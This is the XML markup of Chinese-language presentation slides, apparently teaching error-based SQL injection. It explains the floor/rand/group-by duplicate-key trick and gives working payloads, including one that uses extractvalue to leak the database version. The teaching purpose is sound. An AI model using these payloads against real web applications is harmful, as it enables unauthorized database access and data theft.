              <a:solidFill>
                <a:srgbClr val="1D4999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5" name="内容占位符 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{991A20D3-D8BE-1140-85E8-20A7BEF2EF5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336800" y="2095200"/>
            <a:ext cx="8205788" cy="369332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800" b="0" i="0"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endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="76" name="Object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8306A44-E6CF-5847-8927-8445BFB83920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr userDrawn="1"/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="208800" y="180000"/>
          <a:ext cx="1650275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6" name="CorelDRAW" r:id="rId3" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="CorelDRAW" r:id="rId3" imgW="3593160" imgH="2886480" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="76" name="Object 6">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8306A44-E6CF-5847-8927-8445BFB8392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800" y="180000"/>
                        <a:ext cx="1650275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EED0F0-EA18-A44A-8865-FC4A66BD3A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88800" y="180000"/>
            <a:ext cx="5892800" cy="52493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accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr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RDBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>术语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3504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900"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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="1574800"/>
            <a:ext cx="8798986" cy="4648200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t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104537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C350-C356-3944-8DDD-45A082904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4ED4C-7EAB-1943-B402-11D122622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14C9C-C9F9-1B45-86BB-D9B95AFF9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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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9EECD-D21C-9D44-AD39-BE9C5B9A1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DC8CB-61E6-8143-87DD-05BAED724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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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30880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2F6AE-DBAB-B94C-B7EF-F7A0E2323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39988-D9A1-4C47-91C7-CA676A51D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F9EB7-DAD8-8A4F-8AE8-6E61B12AC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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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C50CD-C997-6B40-B103-7A49D0B49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7B9C2-EA26-8441-A25E-EC065D5A9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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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40242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C8FB2-A947-1444-A88F-280544F45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EC258-65F8-B84C-878B-45326D8CE0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950B6-0584-9C42-87D1-446C933A4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E0C04D-E78D-2146-96E2-D2305DA31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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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0FE213-B464-034D-ACF9-0CAB47F24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187A1A-D47F-3E43-BC4C-15ABB568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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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14931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DB008-4276-9349-B21A-EAB459344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AE9297-1BCD-9646-87F0-90B743E58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2DDB02-BD5F-BC4C-9C23-F7719D7431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3199EF-DEB8-3D4D-BA46-68B1CD9E69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88C5C6-DCCF-5E4A-9528-244AF5B0FB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8B13C9-B10D-8047-83B1-FC9B7A2C6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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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074D2E-31D8-BD44-A3C8-818623AE7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2556E1-780B-674B-B0BA-F507C2922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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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41363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F92D1-F92A-9D4C-9D9A-31D330BB0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3525B1-177D-C340-9FB6-03D39DE5A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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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9158FA-76CB-5347-8887-67B84707A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3F8347-4B3F-9841-84C2-F05F791A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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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35008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B9CAA6-3445-2242-B306-07A30B223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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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3F361D-86BB-3F46-870B-907BE2A0F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35323-72B1-9141-AB86-A1BB5B737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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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947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0B288-A74B-B945-821E-E23842DD1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2FDBA-BED2-6A41-B3D7-7FEF37A51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B3D48-61DC-E04C-AA38-3C075904B0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DCFE4-ABDF-FB49-A06E-12C4972A5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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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36B0EE-EA77-8E40-A7E1-58BA5C8AE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1BC433-E389-E74D-B1D8-710E313C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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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83256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96096-D8BB-D846-9821-E5B7E953A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54DF0C-A2B9-DE41-8F0E-87A865DFA5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109720-D6D5-D54A-BE85-7CB39F36EA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83A124-6B87-3E4E-BA89-23C9294B1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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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4B8180-CCEA-C046-9937-0FB41F3C5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B50A7-2364-E44D-B7AC-47833AA6B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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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86768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37EF4B-F7E4-794A-8B1B-A02732287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36CE9-4FA3-6B4A-A31D-34B6DBA1C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E899A-8385-F748-9B1E-4680D895D1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2FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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E240D-48E8-4C41-AE33-51F567113E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94A87-E74E-A94F-973F-593EAF9C72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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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68AB77C-6195-D54C-86F7-E5D7608A25BC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266" y="-268546"/>
            <a:ext cx="2173734" cy="108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55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81D485D-A2E7-4847-9F0D-F9DDC7B43516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="1077123"/>
            <a:ext cx="3536212" cy="47037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78F8924F-8B41-6142-955D-1B0C6F6F4A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1489006" y="2560041"/>
            <a:ext cx="2438767" cy="2125715"/>
            <a:chOff x="1238250" y="2264138"/>
            <a:chExt cx="2540000" cy="2213954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1C690CBC-8273-D349-8157-7331D1E55C75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3670300"/>
              <a:ext cx="2540000" cy="807792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b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill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SQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill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 注入之</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill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报错注入</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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BC89281-EF38-C940-9341-B270697335B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3349464"/>
              <a:ext cx="76835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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A731677F-9513-A24C-ACA0-117DF9B3D8E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1238250" y="2264138"/>
              <a:ext cx="768350" cy="764490"/>
              <a:chOff x="1238250" y="2264138"/>
              <a:chExt cx="768350" cy="764490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83A41969-86DA-C543-A41D-D1E63FA59F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5664" y="2264138"/>
                <a:ext cx="640936" cy="571437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 166 w 166"/>
                  <a:gd name="T1" fmla="*/ 0 h 148"/>
                  <a:gd name="T2" fmla="*/ 48 w 166"/>
                  <a:gd name="T3" fmla="*/ 148 h 148"/>
                  <a:gd name="T4" fmla="*/ 0 w 166"/>
                  <a:gd name="T5" fmla="*/ 10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6" h="148">
                    <a:moveTo>
                      <a:pt x="166" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="100"/>
                    </a:lnTo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600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68DB313F-F047-E446-9ABB-93D70609E1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8250" y="2364526"/>
                <a:ext cx="660243" cy="664102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 171 w 171"/>
                  <a:gd name="T1" fmla="*/ 62 h 172"/>
                  <a:gd name="T2" fmla="*/ 171 w 171"/>
                  <a:gd name="T3" fmla="*/ 172 h 172"/>
                  <a:gd name="T4" fmla="*/ 0 w 171"/>
                  <a:gd name="T5" fmla="*/ 172 h 172"/>
                  <a:gd name="T6" fmla="*/ 0 w 171"/>
                  <a:gd name="T7" fmla="*/ 0 h 172"/>
                  <a:gd name="T8" fmla="*/ 119 w 171"/>
                  <a:gd name="T9" fmla="*/ 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172">
                    <a:moveTo>
                      <a:pt x="171" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="171" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="0"/>
                    </a:lnTo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600"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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E08C75F-1B3A-3E4F-8D42-D1BA5E8FBE2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230353" y="2514547"/>
            <a:ext cx="597104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定义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&amp;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原理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B4B1C2-1090-CC43-867A-DA4F1AB5C235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4299685" y="2290280"/>
            <a:ext cx="725533" cy="725533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4999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4D9AD9-41AC-0342-95E1-88D45D9880DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278345" y="3972402"/>
            <a:ext cx="725533" cy="725533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4999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0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="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592BB7-8F23-574B-961F-6AEAB26B2E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230353" y="3206339"/>
            <a:ext cx="5971046" cy="1432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029ECB9-83CF-D443-B6E5-F388E0F2F301}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230351" y="4829274"/>
            <a:ext cx="5971046" cy="1432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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD2322A-ECEE-E446-8793-A2B1193347DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230351" y="4220338"/>
            <a:ext cx="597104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示例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E2DB65-76E4-7E4B-86B9-7AEB8AD53726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12095544" y="31598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5549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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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预备函数 </a:t>
            </a:r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kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>floor(x)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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1599269"/>
            <a:ext cx="9855615" cy="355624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CN" dirty="0"/>
              <a:t>floor(x) - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回不大于 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 的最大整数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="444500" cy="4445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12BFCAF-184C-F044-A73F-E5B2D25C772F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327075" y="65195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B51E5185-0037-814F-AABE-06FD83BE4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450" y="2813216"/>
            <a:ext cx="90551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397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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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预备函数 </a:t>
            </a:r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kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>count(x)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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1599269"/>
            <a:ext cx="9855615" cy="355624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CN" dirty="0"/>
              <a:t>count(x) - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>返回 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 数据集的数量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="444500" cy="4445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12BFCAF-184C-F044-A73F-E5B2D25C772F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327075" y="65195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 descr="手机屏幕的截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F03739-1AEE-124A-85F8-BE4B1FA83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450" y="2119700"/>
            <a:ext cx="90551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771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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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常见函数</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - floor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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1599269"/>
            <a:ext cx="9796239" cy="355624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL: select count(*),</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>((select user()),floor(rand(0)*2))x from test group by x;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="444500" cy="4445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DB8B10B-AF70-4C46-9DCA-4B9485DD8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689" y="2819561"/>
            <a:ext cx="11394621" cy="304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602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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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常见函数</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - floor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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1599269"/>
            <a:ext cx="9796239" cy="355624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思考：为什么会触发错误呢？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="444500" cy="444500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="手机屏幕的截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE096FE-0B9E-A04C-A885-D9DA84AE8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000" y="2361600"/>
            <a:ext cx="11394000" cy="361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44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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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常见函数</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - floor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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1563644"/>
            <a:ext cx="9796239" cy="1723794"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>探究：首先来看一下正常的内容是什么？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>结合 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rand</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 函数的特性，继续思考函数报错的原因</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="444500" cy="444500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="手机屏幕的截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D9ED3D-7935-7448-B9B3-088DF1B30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609" y="3261300"/>
            <a:ext cx="11548782" cy="199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840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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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常见函数</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - floor</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="手机屏幕的截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E61529F2-7C8D-3941-B89C-4A4C9BC3B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1523840"/>
            <a:ext cx="10261600" cy="47117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8575988-7289-F44C-AF91-1DBDEF82C67C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4148254" y="2642839"/>
            <a:ext cx="568617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查询主键</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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，不存在，直接插入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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插入时重新计算，主键成为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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</a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent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查询主键</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent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1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent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，存在，直接增加</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent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</a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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查询主键</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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，主键不存在，直接插入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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插入时重新计算，主键成为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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1" lang="zh-CN" altLang="en-US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，无法插入数值为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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kumimoji="1" lang="zh-CN" altLang="en-US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的主键</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN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                   主键插入冲突 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN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Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 报错</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000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0778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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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常见函数 </a:t>
            </a:r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extractvalue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E14782-4650-2440-AC41-0CF73AC29A3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56577" y="1559998"/>
            <a:ext cx="6280518" cy="383902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报错注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pyload</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 原理（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> EXTRACTVALUE </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）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73694E-6419-C940-91E6-3FBB1F0D9C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02513" y="4973475"/>
            <a:ext cx="10035005" cy="189955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?id=1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(0x7e, (select @@version)))</a:t>
            </a:r>
            <a:r>
